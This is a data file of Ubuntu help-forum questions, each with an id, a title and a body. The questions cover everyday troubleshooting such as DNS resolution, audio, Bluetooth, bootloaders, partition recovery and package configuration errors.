244865	ubuntu server not resolving lan hostnames	bit stuck here . i have 2 machines that can not resolve lan hostsnames , unless there are specific entries in /etc/hosts but other machines on the lan can resolves hostnames . my lan : 1 x cisco router runnning dd-wrt v24-sp2 with dnsmasq enabled . i 've configured this with the hostnames and ips on my lan . 1 x kubuntu 12.10 ( resolves all hostnames correctly as long as they are entered into dnsmasq on the router ) 2 x nas ( also resolve all names correctly ) 1 x ubuntu server 12.04 ( this does not resolve local hostnames unless they are entered into /etc/hosts ) 1 x xbmclive ( dharma ) ( same - does not resolve unless entries are in /etc/hosts ) how do i get the last 2 to use the dnsmasq entries on the router ? each machine is set to use the router as a nameserver , and all units resolve external addresses correctly . thanks . some more info : whilst on server , if i ping another pc ( wstation ) $ ping wstation ping wstation.local.domain ( x.x.x.x ) if i then append .local $ ping wstation.local ping wstation.local.local.domain ( x.x.x.x ) and directly $ ping 10.0.0.4 ping 10.0.0.4 ( 10.0.0.4 ) 56 ( 84 ) bytes of data . 64 bytes from 10.0.0.4 : icmp_req=1 ttl=64 time=0.387 ms 64 bytes from 10.0.0.4 : icmp_req=2 ttl=64 time=0.316 ms 64 bytes from 10.0.0.4 : icmp_req=3 ttl=64 time=0.312 ms 64 bytes from 10.0.0.4 : icmp_req=4 ttl=64 time=0.280 ms 64 bytes from 10.0.0.4 : icmp_req=5 ttl=64 time=0.322 ms ^c -- - 10.0.0.4 ping statistics -- - 5 packets transmitted , 5 received , 0 % packet loss , time 3998ms rtt min/avg/max/mdev = 0.280/0.323/0.387/0.038 ms
244866	installing conky and get this `` configuring ttf-mscorefonts-installer ? ''	everytime i got into terminal and run sudo apt-get install conky i get screen pop up in my terminal saying.. '' truetype core fonts for the web eula │ │ end-user license agreement for microsoft software │ │ important-read carefully : this microsoft end-user license agreement │ ( `` eula '' ) is a legal agreement between you ... '' dont know how to get past this and continue with conky instalation . thanks for the help .
244869	ubuntu 12.10 'laggy ' -- can this be ?	this is a bit of an odd question , and i do n't think 'laggy ' is the right word , but bear with me . i installed ubuntu 12.04 some time ago after a windows crash on a desktop i use from time to time ; more recently i upgraded ( note upgraded ) to 12.10 . overall i am happy , it 's clean , fun , simple and it works . i 've been tinkering with it ( 12.10 ) a bit more lately , and then yesterday i put an old hard-drive into my computer and re-installed xp-home on it ( for particular reasons that only windows can fulfill ) -- though ubuntu will remain my main os . i noticed while using xp today that in comparison , ubuntu overall seems slower . in xp when i double click , let 's say , 'my documents ' the window opens almost instantaneously . the same thing is true for media , video files are launched in vlc very quickly . i 've been noticing that in ubuntu there is a serious delay between clicking and opening . enough that sometimes i double-double click because i think it 's not going to open . things always launch with no problem , but there is a definite 'slowness ' to the way the whole os runs . i will note as well that programs , once they are open , run , respond , play and act completely normally . videos are fine , web browsing is snappy , photo-editing is great , downloads are normal -- it 's just the actual os that seems affected . and as well , there is not a lot set to open at start-up , and there does n't need to be any load on memory or cpu whatsoever for this to happen . i find this surprising because i would n't imagine this to be a hardware-derived issue , since i am sure windows xp hogs more resources than 12.10 . the computer is moderately new with 2gb of ram and a few-years-old processor . i guess my main question is -- could this be a result of 'upgrading ' rather than having done a complete wipe and fresh install of 12.10 ? are there any diagnostics/tests i can run to determine if something is wrong ? sorry if this is convoluted , all help is appreciated . m
244870	no sound through headphones after recent pulseaudio updates in ubuntu 12.04lts	i just recently ran updates on my ubuntu 12.04lts and noticed that there were updates to pulseaudio . just my luck and i have discovered an issue with no sound via only headphones . i have verified that i have sound via pc speakers but when using no headphones no sound at all . i have also verified that headphones are ok , i have tested them on multiple devices and i 'm able to hear sound just fine . something must have changed within pulse audio to break sound via headphones , how can i troubleshoot this ? headphone working perfectly fine until i updated ubuntu . what information can i provide to help resolve the issue . please help ! ! !
244878	12.10 bluetooth not detecting wii remote	my bluetooth is set to `` on '' and hcitool dev returns hci0 's mac address . when i use wmgui and tell it to connect and press 1+2 ( or the red sync button ) , it just returns `` unable to connect '' . when i run hcitool scan it says `` scanning ... '' and after a few seconds closes . is there any chance my bluetooth is detected as on and working but is not actually functioning ?
244879	htdocs permission	i am completely new to ubuntu ... though i installed htdocs and give it permission using command chmod -r 777 /opt/lampp/htdocs . it works fine . but i wish to avoid it doing again and again . their after i followed tutorial on http : //superuser.com/a/268996 but it does n't work for me ... as i tried ls -ld /opt/lampp/htdocs it gives me following . drwxrwsr-x 8 nobody shadaab 4096 current-date-n-time /opt/lampp/htdocs .. as i continued with group shadaab . but it does n't work . again every time i have to use command chmod -r 777 /opt/lampp/htdocs if i copy something to my folder . please help . if i run 'localhost ' it works fine . but if i use 'localhost/project ' it gives 'access forbidden error . '
244882	how do i do set /a on wine cmd ?	how do i use the set /a command on the wine version of cmd ? this does n't work for me on ubuntu 12.04 lts : set /a option=1+1 echo % option % on a windows computer it would output 2 on the screen but in the wine version it just outputs whether echo is on or not . how do i fix this ?
244905	install koma-script for texworks on ubuntu	i was updating my resume and since i had recently switched to using ubuntu and latex i decided i would rewrite it in this environment . i downloaded a template , but when i compiled it ( in texworks ) received the following error : ! latex error : file `scrartcl.cls ' not found . after looking this error up i found it was because a non-standard article class was being used : \documentclass [ paper=a4 , fontsize=11pt ] { **scrartcl** } scrartcl.cls is from the koma-script project , brief description here . i downloaded the package , uncompressed it and then added the path in texworks : edit- > preferences- > typesetting . unfortunately the above error remains . i read somewhere that you could type `` texdoc koma '' into the terminal . this produced the message : sorry , no documentation found for koma . maybe i need to install it ? the install.txt file says : finally , update or 'refresh ' the filename database . with tetex and tetex-based systems this is done with the program `texconfig ' or directly with 'texhash ' or 'mktexlsr ' . not really sure what to do . any help would be appreciated . thanks .
244907	what is the best type-2 hypervisor in ubuntu ( 14.04 ) to run a mix of windows and linux vms ?	i need to create lab contains windows 2008r2 domain controller with linux servers and workstations with different roles installed . hence i need a hypervisor ( type 2 ) for the same . my laptop does not have vt enabled hence type-1 hypervisors ( like kvm or xen ) will not help me . : ( note : i have already tried virtualbox ; downloaded from their website . however that ( virtualbox ) has become unresponsive and often bug checking in windows guest . i have uninstalled that and installed it back again from ubuntu software center . but it continues to blue screened on me . i am using ubuntu 14.04 x32 . _
244909	can ubuntu/linux machines be infected by the shylock trojan ?	i 've heard of this trojan that can now spread through skype . i use skype regularly and also access my online banking account occasionally on my machine . should i be worried ? i also run clamav and a firewall . i 'm on 12.04 . what steps can this noob take to gain further protection ?
244911	how do i partition my hardrive ?	i am a complete and total newbie when it comes to ubuntu and do n't happen to be tech savvy to begin with . i 've tried to wrap my head around the user invasive interface with what resources i can find but obviously do n't seem to be looking in the right places . to get to the point i 'm running into a lack of partitioned space . i 'm using ubuntu 12.04 on one hardrive and xp on the other ( which i ca n't get to boot either but i think thats because of a video hardware/software/whatnot problem ) . what other information do i need to provide in order to begin here ? thanks for any help provided !
244912	how do i prevent ubuntu from upgrading ?	i 've been struggling with this bug the whole day . i 've managed to install following the first workaround proposed , but after i install the nvidia-current drivers i end up in a small 640x480 screen and i ca n't select the nvidia drivers with jockey-text . as mentioned in the bug description this does n't seem to happen in 11.10 , so i dug into my cd collection and found an old 11.04 . i 'm not done testing it , but so far so good . but now i 'm very afraid to update stuff . how can i prevent ubuntu from upgrading ? or , should i look out and only not upgrade certain packages related to the mentioned bug ?
244913	compiling c programs on ubuntu 12.04	i 'm an absolute beginner at writing programs in c , and i 'm having difficulty compiling a simple program . here 's my code : /* this code is a .c file that prints out the words hello , world . */ # include < stdio.h > int main ( ) { printf ( `` hello world ! \n '' ) ; } here 's the error i get when compiling : ubuntu : ~/desktop/cfiles $ gcc -wall hello.c -o hello.out -lmls hello.c:5:1 : warning : return type defaults to ‘int’ [ -wreturn-type ] hello.c : in function ‘main’ : hello.c:7:3 : warning : implicit declaration of function ‘print’ [ -wimplicit-function-declaration ] hello.c:8:1 : warning : control reaches end of non-void function [ -wreturn-type ] /usr/bin/ld : can not find -lmls collect2 : ld returned 1 exit status i 'm not sure what i 'm doing wrong . can anyone help ?
244914	how can i successfully sync this folder with ubuntu one ?	i am trying to sync a folder containing an .avi video to ubuntu one . it is 3.2 gb in size , and i 'm using 12.04 . i can sync this folder - but when opened , it contains no files . it has been allowed to sync for at least 30 minutes and is still syncing . i have tried syncing other smaller files and done so successfully . is 3.2 gb too big for ubuntu one or are .avi files unsupported ?
244924	will converting my first partition to ext4 make me lose boot info ?	i recently switched from windows to lubuntu as my sole os . my filesystem now has a ntfs partition with all my data ( which i now would like to convert to ext4 ) , a ext4 partition with lubuntu on it and a swap partition . i have a full backup of the data , so wiping the ntfs partition is not the problem . but i want to be sure that , after wiping/converting it i can still boot lubuntu just as before . the data partition is the first partition and gparted shows me a 'boot ' flag on it . here is my boot info output : http : //paste.ubuntu.com/1548312/ can i just delete the partition , and create a ext4 one in it 's place with gparted ? would be great if someone with greater knowledge could have a look ! : ) thanks a lot in advance .
244925	is this a unity dash bug or aptana studio 3 bug ? icon in dash being displayed really large .	i have installed aptana studio 3 and you can see the icon in unity dash is being displayed , very large . is it a unity dash bug or just aptana studio 3 bug ?
244933	failed to update - internet connection error	i am using ubuntu 12.04 lts . i m trying to update but i get an error failed to download repository information check your internet connection . my internet connection is fine . when i see details of the error an get this w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release unable to find expected entry 'main/source/sources ' in release file ( wrong sources.list entry or malformed file ) , e : some index files failed to download . they have been ignored , or old ones used instead . any help please
244934	how to add my ubuntu 12.10 to my windows xp boot.ini file ?	i have a primary 80gb hdd which is partitioned into 3 drives ( core , data & extended ) with windows xp installed in the c drive ( core - with ntfs file system ) . i have a secondary 500gb hdd which is partitioned by ubuntu 12.10 into 2 drives seen in linux only ( ext4 file system ) . when i installed the ubuntu 12.10 installed properly without much issues . but when i restarted the system boots directly into the windows xp . if i press f8 and go to my secondary drive i can boot into ubuntu and work there without much issues . i even installed kde there and logged in to both unity and kde without any issues . i want to know if it is possible to add my ubuntu to my windows xp boot.ini file even though both are into separate physical hard drives and file systems ? ! ! if so , can someone provide me the step by step method to do that to be able to see dual boot option without having the need to press f8 and choose the secondary drive from bios mode . thanks in advance .
244946	how do i load the tp_smapi kernel module on a lenovo easypad ?	i own a lenovo easypad z580 running ubuntu and i 'd like to manage more of the power management ( battery ) . i found answers in this question about battery management on lenovo systems : how can i limit battery charging to 80 % capacity ? so , i 've installed tp smapi using the following command : sudo apt-get install tp-smapi-dkms aquaherd 's answer seems to settle the problem for some users . in the comments however it is clear it throws the following error for other users ( me included ) : sudo modprobe tp_smapi fatal : error inserting tp_smapi ( /lib/modules/3.5.0-17-generic/updates/dkms/tp_smapi.ko ) : no such device dkms reports ( dkms status ) : tp-smapi , 0.41 , 3.5.0-21-generic , x86_64 : installed i checked the following sources , but they all seem too advanced for me . is there a way to install tp_smapi without messing too much with kernels and source code etc ? if there is not , can someone explain the various steps proposed in some of these howto's can not set tp_smapi thresholds on a thinkpad http : //www.ubuntu-unleashed.com/2007/09/howto-extend-life-of-your-thinkpads.html http : //ubuntuforums.org/showthread.php ? t=1752993 http : //ubuntuforums.org/showthread.php ? t=1752993 http : //unix.stackexchange.com/questions/11670/how-to-load-tp-smapi-on-thinkpad-x120e
244949	dynamically change the application icon	the icon used for the app is in the .desktop file but is it possible to change this dynamically ? you can change the count but not the icon . is there an api for doing this like os x ?
244957	what package to file general ( usability ) bug against ?	i am experiencing a bug where on first login to an ubuntu/unity session ( 12.04 ) , my mouse buttons are not inverted ( left-handed ) . the configuration does correctly list them as inverted , but they do n't behave that way . if i log out and login again , they behave correctly , as per the configuration . it worked correctly for the longest time and only recently started misbehaving . now my question is : how should one report such a bug ? i have no idea what package or process causes the problem . in fact , there may be multiple packages involved . i have a launchpad account and have reported bugs , or added information to bugs , in the past , so i 'm familiar with the process . i just ca n't figure out how to report this without taking a guess at the responsible process to pass to ubuntu-bug .
244960	how can i install ubuntu on my virtual harddisk ( one of the feature of windows 7 )	i would like to know how to install ubuntu on my virtual hard drive which i created on windows 7 . the problem lies in making my virtual drive an active one . how can i make my virtual drive active for installing ubuntu on this virtual disk only so that it wo n't harm my real hdd ?
244961	change keyboard layout inside recovery mode	i had two keyboard layouts : `` swedish '' and `` farsi '' in my ubuntu 11.10 . after upgrading to ubuntu 12.04 i now am stuck at login screen . reason is that i only see and have farsi layout which has close to arabic words and my password requires latin words . i am not such a big user of ubuntu . i wanted to change setting in /etc/default/keyboard however the layout is mentioned to be `` se '' standing for swedish however what i see is farsi layout . i tried commanding sudo apt-get install console-common , however in recovery mode , i could not get anything . if your solution requires changing config files in console , please write the command too as i only know `` cat '' command .
244962	how can i use code or a script to lock my screen programmatically in lubuntu ?	i want to write code or a script to lock the pc when my c++ program receives a specific command from ethernet . is there any way to show the login screen from the command line ? i want to lock the screen from a c++ code . actually i want to do something like ctrl + alt + l programmatically ( from a c++ code ) . thanks edit : i found the way . for those who want to know , as lubuntu uses lxde desktop , it has some methods to do thing like it . the command for locking the screen is lxlock .
244965	grub customizer error on startup	i cant start grub customizer in ubuntu 12.04 after updating the kernel : exception '15assertexception' with message 'found unexpected file on path : /etc/grub.d/10_linux' in /build/buildd/grub-customizer-3.0.2/src/model/listcfg.cpp:916 also update-grub command shows two identical kernels : found linux image : /boot/vmlinuz-3.2.0-36-generic found initrd image : /boot/initrd.img-3.2.0-36-generic found linux image : /boot/vmlinuz-3.2.0-36-generic found initrd image : /boot/initrd.img-3.2.0-36-generic found memtest86+ image : /boot/memtest86+.bin found windows 8 ( loader ) on /dev/sdb1 solution found : i removed all files in /etc/grub.d/ starting with ds_ and used update-grab again
244969	gpt and os x - partition missing	him i 'm fixing my fiends usb drive . afik it was inserted into windows , and partition were corrupted . i did manage to fix guid headers with gpt_surgeon.py and mount it , but then mac did got messy , slow , sth like filesystem write errors occured.. ( partition may be corrupted now ) the problem is : i see now 2 out of 3 partitions . i do have a copy of my gpt header done before on my ubuntu : ) , i did restore it with gdisk , but eventhough i can see partitons , mac ( diskutil ) still sees only 2 of them on mac : sh-3.2 # diskutil list /dev/disk1 /dev/disk1 # : type name size identifier 0 : guid_partition_scheme *2.7 ti disk1 1 : apple_hfs 128.0 mi disk1s1 2 : apple_hfs 2.7 ti disk1s2 sh-3.2 # gpt -r -vv show disk1 gpt show : disk1 : mediasize=3000592981504 ; sectorsize=512 ; blocks=5860533167 gpt show : disk1 : pmbr at sector 0 gpt show : disk1 : pri gpt at sector 1 gpt show : disk1 : sec gpt at sector 5860533166 start size index contents 0 1 pmbr 1 1 pri gpt header 2 32 pri gpt table 34 262144 1 gpt part - e3c9e316-0b5c-4db8-817d-f92df00215ae 262178 6 262184 409600 2 gpt part - c12a7328-f81f-11d2-ba4b-00a0c93ec93b 671784 2008 673792 5859597192 3 gpt part - 48465300-0000-11aa-aa11-00306543ecac 5860270984 262150 5860533134 32 sec gpt table 5860533166 1 sec gpt header on ubuntu : parted /dev/sdc print model : wdc wd30 ezrx-00mmmb0 ( scsi ) disk /dev/sdc : 3001gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 17.4kb 134mb 134mb microsoft reserved partition msftres 2 134mb 344mb 210mb fat32 efi system partition boot 3 345mb 3000gb 3000gb and gdisk : root @ # gdisk /dev/sdc gpt fdisk ( gdisk ) version 0.8.5 partition table scan : mbr : protective bsd : not present apm : not present gpt : present found valid gpt with protective mbr ; using gpt . *********************************************** command ( ? for help ) : r recovery/transformation command ( ? for help ) : l enter backup filename to load : 3tbgpt.backup recovery/transformation command ( ? for help ) : i partition number ( 1-3 ) : 1 partition guid code : e3c9e316-0b5c-4db8-817d-f92df00215ae ( microsoft reserved ) partition unique guid : 4100c4ff-ab62-4a9e-bd57-3ff3dba219f0 first sector : 34 ( at 17.0 kib ) last sector : 262177 ( at 128.0 mib ) partition size : 262144 sectors ( 128.0 mib ) attribute flags : 0000000000000000 partition name : 'microsoft reserved partition' recovery/transformation command ( ? for help ) : i partition number ( 1-3 ) : 2 partition guid code : c12a7328-f81f-11d2-ba4b-00a0c93ec93b ( efi system ) partition unique guid : 42a4c1ca-1038-4aba-bfba-3fcea700617c first sector : 262184 ( at 128.0 mib ) last sector : 671783 ( at 328.0 mib ) partition size : 409600 sectors ( 200.0 mib ) attribute flags : 0000000000000000 partition name : 'efi system partition' recovery/transformation command ( ? for help ) : i partition number ( 1-3 ) : 3 partition guid code : 48465300-0000-11aa-aa11-00306543ecac ( apple hfs/hfs+ ) partition unique guid : 8f70aeb5-6572-484c-948b-1bee834630a9 first sector : 673792 ( at 329.0 mib ) last sector : 5860270983 ( at 2.7 tib ) partition size : 5859597192 sectors ( 2.7 tib ) attribute flags : 0000000000000000 partition name : 'apple_hfs_untitled_2' how mac initialize disk , why ca n't it reads gpt thanx for any help fsck.hfsplus /dev/sdc3 ** /dev/sdc3 fsck not working : / i would already give up , but the fact that i did manage to make it work makes me try harder . i think mac might have do sth to the partition table while it failed unmounting i tried with hybrid mbr and conversion gpt to mbr - at this step i had only 2 partitions , while before there were 3 on gpt number start end size type file system flags 1 17.4kb 134mb 134mb primary lba 2 134mb 344mb 210mb primary fat32 ( 3 is missing while gpt- > mbr conversion )
244972	update manager version 12.04	i see lots of refernces to using the update manager , but where on earth do i find this ? ? can not see anything at all relating to it on my version of ubuntu 12.04 thank you lorganz
244974	acpi or other event for ( physical ) screen rotation on thinkpad x220	i have a thinkpad x220 where one can flip the screen . i 'd like to use the physical state of the laptop in a script , like letting acpi or udev call the rotation script when i rotate the laptop . how can i find out where the state of the laptop is exposed , if at all ? the states that i mean :
244975	asus n55sf dual monitor setup	i am a new user of ubuntu . i wanted to plug my 24 inch samsung monitor to my laptop with hdmi . my laptop has an nvidia gt 555m and an i7 sandy bridge . so i have 2 graphic cards . but when i go to displays it said there is only one display ( the one from my laptop ) . i have tried several things , i have installed bumblebee but i do not know how to use it . i only know about optirun for using the nvidia card .
244981	libreoffice changes fonts for utf-8 characters while importing pdfs	when i import pdfs to libredraw ( 1:3.5.4-0ubuntu1.1 ) with utf8 characters ( with polish special signs ) get something like : the letters are using correct fonts in the pdf before import : does anyone know how to change that , so that i would get one font for all of the characters ?
244984	disable file transferring through skype in ubuntu	i want to disable file transferring option in skype in a computer that is running ubuntu 11.10 . the files can be leaked and i was ordered to maintain security and disable file transfer through skype . if it is possible please provide me a solution . how can i do this like this can be done in windows by editing the registry ? in ubuntu how can i the disable file transferring option in skype ?
244985	debconf errors when configuring mysql-server	when i try to run sudo apt-get upgrade i get the error below . i also get similar error when running sudo reconfigure postfix , which i relly need to run since outgoing e-mail is not working any more . i have also run sudo apt-get autoclean , sudo apt-getclean , sudo apt-get install debconf -- reinstall and sudo apt-get install -f without success . magento @ ubuntu : ~ $ sudo apt-get install debconf -- reinstall reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-3.5.0-17 linux-headers-3.5.0-17-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : mysql-server-5.5 suggested packages : tinyca mailx the following packages will be upgraded : mysql-server-5.5 1 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 8 not upgraded . 28 not fully installed or removed . need to get 149 kb/8,990 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //no.archive.ubuntu.com/ubuntu/ quantal/main debconf all 1.5.46ubuntu1 [ 149 kb ] fetched 149 kb in 0s ( 472 kb/s ) use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory ( reading database ... 81482 files and directories currently installed . ) preparing to replace mysql-server-5.5 5.5.28-0ubuntu0.12.10.1 ( using ... /mysql- server-5.5_5.5.28-0ubuntu0.12.10.2_amd64.deb ) ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg : trying script from the new package instead ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory dpkg : error processing /var/cache/apt/archives/mysql-server-5.5_5.5.28- 0ubuntu0.12.10.2_amd64.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/mysql-server-5.5_5.5.28-0ubuntu0.12.10.2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) running ubuntu 12.10 . command df gives : filesystem 1k-blocks used available use % mounted on /dev/mapper/magento-root 53613052 6529812 44359812 13 % / udev 3978932 4 3978928 1 % /dev tmpfs 1595380 264 1595116 1 % /run none 5120 0 5120 0 % /run/lock tmpfs 3988440 0 3988440 0 % /run/shm none 102400 0 102400 0 % /run/user /dev/sda1 233191 53511 167239 25 % /boot i have seem post where it suggested to not use tmpfs for /var/cahce , if this is the problem , how can i configure ubuntu to use my hard drive ( and ssd ) for /var/cache . thanks in advance for any help , and forgive me for my newbieness.. update : running sudo apt-get update -- fix-missing sudo apt-get autoremove & & sudo apt-get clean & & sudo apt-get install -f gives : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : mysql-server-5.5 suggested packages : tinyca mailx the following packages will be removed : linux-headers-3.5.0-17 linux-headers-3.5.0-17-generic the following packages will be upgraded : mysql-server-5.5 1 upgraded , 0 newly installed , 2 to remove and 8 not upgraded . 28 not fully installed or removed . need to get 0 b/8,840 kb of archives . after this operation , 69.9 mb disk space will be freed . do you want to continue [ y/n ] ? y use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory ( reading database ... 81482 files and directories currently installed . ) preparing to replace mysql-server-5.5 5.5.28-0ubuntu0.12.10.1 ( using ... /mysql- server-5.5_5.5.28-0ubuntu0.12.10.2_amd64.deb ) ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory dpkg : warning : subprocess old pre-removal script returned error exit status 1 dpkg : trying script from the new package instead ... use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory dpkg : error processing /var/cache/apt/archives/mysql-server-5.5_5.5.28- 0ubuntu0.12.10.2_amd64.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 1 use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : no such file or directory dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/mysql-server-5.5_5.5.28-0ubuntu0.12.10.2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
244986	working directory when running command	i 've got an executable , let 's call it exec . it lives in a directory , for the sake of argument called dir . let 's say it 's at the filesystem root . i can run this executable by doing cd /dir ./exec if i try to run it from anywhere else , by doing /dir/exec it fails to run . from the error message it spews out , it looks like it 's trying to look for support files in the directory from which the command was run , not in its own directory . so far not a massive problem . however , i 'd like to alias the command so i can call it from anywhere . i can write an alias as follows : alias foo= '' cd /dir ; ./exec & '' but that leaves my terminal in /dir , which i do n't want . i also do n't want to change back to some arbitrary directory , i want to stay where i was . can this be done ?
244987	how can i install celtx 2.9.7 properly on ubuntu 12.04 lts ?	i am new to ubuntu and linux and i want to install and use the newest version of the screenwriting software celtx on ubuntu 12.04 lts . after trying https : //answers.launchpad.net/ubuntu/+source/ubiquity/+question/206295 and using sudo add-apt-repository ppa : dreamstudio/video sudo apt-get update sudo apt-get install celtx i unfortunately had to find out that was a rather old version with a fairly screwed up ui . i then downloaded the newest version from http : //download.celtx.com/2.9.7/celtx-2.9.7-64.tar.bz2 but now i do n't know how to properly install it . i extracted it to /home/username/ ( there was no ~/bin/ ) as described here and i can now launch the application by running the file celtx within that folder ( i get asked whether i want to display , run or run it in terminal ) and it works fine . but i ca n't get it to launch from unity . i tried right-clicking the launcher button and going `` lock to launcher '' while it 's running and it does create an icon but clicking it to launch the program does nothing . also searching for celtx in the dash does n't find the app . and advice on how to properly install celtx 2.9.7 in ubuntu 12.04 lts ?
244988	how does hotkeys , lid close , suspend etc . work with ubuntu on a newer thinkpad laptop ?	i am trying to setup my thinkpad t420 with xmonad as window manager and with as little gnome as possible . if i launch gnome-settings-manager all my hotkeys ( disable touchpad , volume up/down , brightness up/down mute etc ) works and sleep when closing lid works . if i do not launch the gnome-settings-manager ( which i am trying to avoid ) only the brightness up/down works ( disable touchpad , volume , sleep when closing lid etc . does not work ) . so i 'm trying to understand how all this works . why are the brightness keys ( fn+home/end ) different from disable touchpad ( fn+f8 ) ? i thought i had cracked it , that it was just /etc/acpi/ and /etc/acpi/event scripts being called upon all the actions but that does not seem to be the case . what does gnome do that makes it all work and how do i set it up without gnome ( i.e . tie the hotkey presses to the correct acpi scripts or the like ) ? do i need another power manager to listen for the key events or ?
